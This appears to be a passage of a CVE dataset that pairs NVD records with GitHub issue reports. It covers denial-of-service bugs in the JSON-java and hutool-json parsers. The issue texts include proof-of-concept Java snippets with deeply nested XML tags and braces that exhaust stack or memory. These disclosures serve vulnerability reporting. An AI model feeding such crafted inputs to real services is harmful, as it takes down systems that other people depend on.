><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a>";
XML.toJSONObject(s);
}
}
```
and the. result:
<img width="872" alt="image" src="https://user-images.githubusercontent.com/32029400/202455618-ee36c463-aa67-4b9d-bd0a-1af961fe235e.png">
| XML.toJSONObject may lead to StackOverflowError which may lead to dos when parses untrusted xml: CVE-2022-45688 | https://api.github.com/repos/stleary/JSON-java/issues/708/comments | 17 | 2022-11-17T13:12:45Z | 2023-02-15T18:25:14Z | https://github.com/stleary/JSON-java/issues/708 | 1,453,324,921 | 708 | 4,495 |
CVE-2022-45689 | 2022-12-13T15:15:11.323 | hutool-json v5.8.10 was discovered to contain an out of memory error. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2747"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2747"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B9093201-DAC8-4158-83DA-F0DC735A7F16",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/dromara/hutool/issues/2747 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dromara",
"hutool"
] | ### 版本情况
JDK版本: openjdk_8_201
hutool版本: 5.8.10(请确保最新尝试是否还有问题)
### 问题描述(包括截图)
1. 复现代码
```
public static void main(String[] args) {
String a="{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{'a':1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}:1}";
JSONObject jsonObject=new JSONObject(a);
}
```
2. 堆栈信息
<img width="1053" alt="image" src="https://user-images.githubusercontent.com/32029400/202851698-e13bf298-8a57-4622-9fa9-00fc3286c998.png">
3. 测试涉及到的文件(注意脱密)
比如报错的Excel文件,有问题的图片等。 | Find a OutOfMemoryError which may lead to dos in hutool-json | https://api.github.com/repos/chinabugotech/hutool/issues/2747/comments | 3 | 2022-11-19T12:50:17Z | 2022-12-29T06:43:39Z | https://github.com/chinabugotech/hutool/issues/2747 | 1,456,453,860 | 2,747 | 4,496 |
CVE-2022-45690 | 2022-12-13T15:15:11.387 | A stack overflow in the org.json.JSONTokener.nextValue::JSONTokener.java component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2746"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/654"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2746"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/654"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B9093201-DAC8-4158-83DA-F0DC735A7F16",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/dromara/hutool/issues/2746 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dromara",
"hutool"
] | ### 版本情况
JDK版本: openjdk_8_201
hutool版本: 5.8.10(请确保最新尝试是否还有问题)
### 问题描述(包括截图)
1. 复现代码
```
public static void main(String[] args) {
String a="{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{